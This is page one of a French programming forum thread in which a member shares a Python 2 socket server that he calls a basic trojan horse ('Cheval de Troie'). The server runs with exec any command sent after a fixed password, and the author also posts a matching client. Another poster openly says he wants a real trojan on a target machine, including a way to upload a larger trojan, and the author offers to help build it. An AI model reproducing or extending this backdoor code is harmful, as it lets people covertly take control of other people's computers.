Page 1 sur 4 123 ... DernièreDernière
Résultats de 1 à 10 sur 33

Sujet : Accès à distance

Membre MP
    Inscrit
    août 2013
    Attention: Le but de ce sujet est le développement d\'un accès à distance sur SON propre pc.

A tous ceux que ça intéresse, voilà un moyen d\'accéder à son pc (ou un autre) à distance avec un code Python. Le principe est qu\'on doit connaître l\'IP, le mot de passe (qu\'on écrit soi-^m) et qu\'on peut alors donner au récepteur tous les ordres Python qu\'on veut. : et donc tout faire à distance. J\'ai aussi déclaré comme \'global\' le client pour que le dernier connecté puisse s\'envoyer des données et les accusés de réception.

Voici la source: :8):
    Code:
    # Horse of Troy

# yougo@hugoh.org

# Cheval de Troie basic en Python
    # utilisant les sockets et multi-threadé

import socket
    from thread import start_new_thread as nth

myname=\"Horse X\"
    myport=876
    mypasw=\"Ulysse\"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.bind((\'\',myport))

sock.listen(999)

global clnt, file

def dial(clnt,addr):
        file=open(\"SecretWay-historique.txt\",\'a\')
        file.write(\'\\n\\nNouvelle session: \'+str(clnt)+str(addr))
        clnt.send(myname)
        cPasw=clnt.recv(30)
        file.write(\"\\nMot de passe:\"+cPasw)
        if cPasw<>mypasw:
            clnt.send(\'{bye}\')
            return
        else:clnt.send(\'{welcome}\')
        while 1:
            stamp=clnt.recv(1024)
            file.write(\"\\n>>\"+stamp)
            try:
                exec stamp
                clnt.send(\'{done}\')
                file.write(\"\\n{done}\")
            except:
                clnt.send(\'{error in \"\'+stamp+\'\" }\')
                file.write(\'\\n{error in \"\'+stamp+\'\" }\')

while 1:
        clnt,addr=sock.accept()
        nth(dial,(clnt,addr))

youpiiii !

nan g un petit bléme :

kel est la partie \"client\" et la pertie \"serveur\" ?
    ce que tu donne c le serveur ? ou est le client ??
    ou mets on la pass ?

cool... répond vite STP pour que je l\'utilise rapidement !

Membre MP
    Inscrit
    août 2013
    Il s\'agit du serveur only.
    Pour le client, tu peux utiliser n\'importe quel language et il suffit de faire un truc du genre:

from socket import*
    from thread import start_new_thread as newthread
    mysock=socket(AF_INET,SOCK_STREAM)
    mysock.connect((\'80.201.231.243\',876)) # modifier ip et port
    print mysock.recv(1024) # 1024 est le max du standart socket
    mysock.send(raw_input(\'Mot de passe:\'))
    def receiving():
    while 1rint mysock.recv(1024)
    newthread(receiving,tuple())
    while 1:
    mysock.send(raw_input(\'>>\'))

g ka compiler les 2 code ke tu vien de me fournir et je pourrai utiliser ce \"trojan\" ??!
    mais le server je sais il sera discret... et le client sera en GUI avec certéne option ?
    sinon a koi sa sert... :roll:
    en fait kan on executera le server...; je me connecterai par le client mais kel seront les option possibles ? que pourraije faire sur le pc ??

@+

ps: il y a un moyen d\'éditer l\'IP et le port + le mdp otre que ds la source ??

Membre MP
    Inscrit
    août 2013

Accès à distance

Ceci est la base de la base:
    Il n\'y a pas de GUI (=interface grafique) ni d\'un côté ni de l\'autre mais si tu veux en faire une, je peux t\'y aider.
    Concernant les actions possibles: Tu peux donner tous les ordres Python que tu veux (un peu comme dans un shell Python) et le serveur les exécutera et t\'enverra un accusé de réception et d\'exécution. Si tu veux qu\'il t\'envoie une donnée, tu lui dit: \"clnt.send(donnée)\" et il enverra la donnée au dernier utilisateur connecté (de même que les accusés). Pour exécuter les ordres, Python utilise le génial \"exec\".

PSas besoin de compiler en Python

ce qui m\'intéresserai serai de faire un VRAI trojan...
    avec un server sur la cible...
    et un client pour moi avec des options tels que l\'exploration des HD, changer les paramétres, la base de registre etc...
    mais aussi :

j\'aimerai essayer de cré (avec ton aide si possible) un petit uploader qui se compose de 2 parties client/server.
    une fois le server executer sur le serveur cible, bah j\'ouvre une connection avec mon client qui permet d\'upé un server de trojan + gros tel que \"prorat\" ...
    en fait si tu veux moi chui + ds le hacking... on va dire qu\'il la hierrarchie
    n00b --> hacker --> elite

bah moi je seré a 3/4 su n00b... donc pas loin du nivo \"hacker\" (sans prétentions...) . mais g encore ENORMEMENT de cjoses a apprendre... et c\'est pour cela que j\'apprends des langages de programmation !

Membre MP
    Inscrit
    août 2013
    Mon objectif n\'est pas le même mais comme les deux se ressambles, on peut s\'y attaquer dès maintenant si tu veux. On enregistre le projet dans les projets OpenSource de MProg ou autre-part et on l\'améliore. Je suis à 95% pour et c\'est les vacances à partir de demain pour moi. Note que pour le moment, tu peux déjà tout faire de ce que tu a dit à condition de très bien connaître le language.
    En fait, il manque plus que des commandes simplifiées et un moyen de retrouver l\'IP de la machine contenant le server. Après, une petite GUI pour le fun et on sera des boss de l\'accès à distance :8):

ah oué chui content !
    mais je connais rien en python... vraiment le strict minimum (écrire une msgbox lol !)
    je prends contact avec toi par mail et sur msn messenger si tu la bien sur !

++

Membre MP
    Inscrit
    août 2013
    Ok. Mon adresse Msn est dispo sur la petite icone \"mail\" ici dessous.

Membre MP
    Inscrit
    août 2013
    Sondage: qui est intéressé par la réalisation d\'un server d\'accès à distance en Python ?

( Pq Python: Python est le mieux adapté car c\'est un language interprété et qu\'il suffit donc d\'envoyer des ordres en Python au \"cheval\" pour qu\'il les interprète, ce qui est impossible en C, Asm ou tout autre language compilé à moins de créér toutes les commandes à la main )

Page 1 sur 4 123 ... DernièreDernière

Informations du sujet

Utilisateur(s) parcourant ce sujet

il y a actuellement 1 utilisateur(s) parcourant ce sujet. (0 membre(s) et 1 visiteur(s))

Règles des messages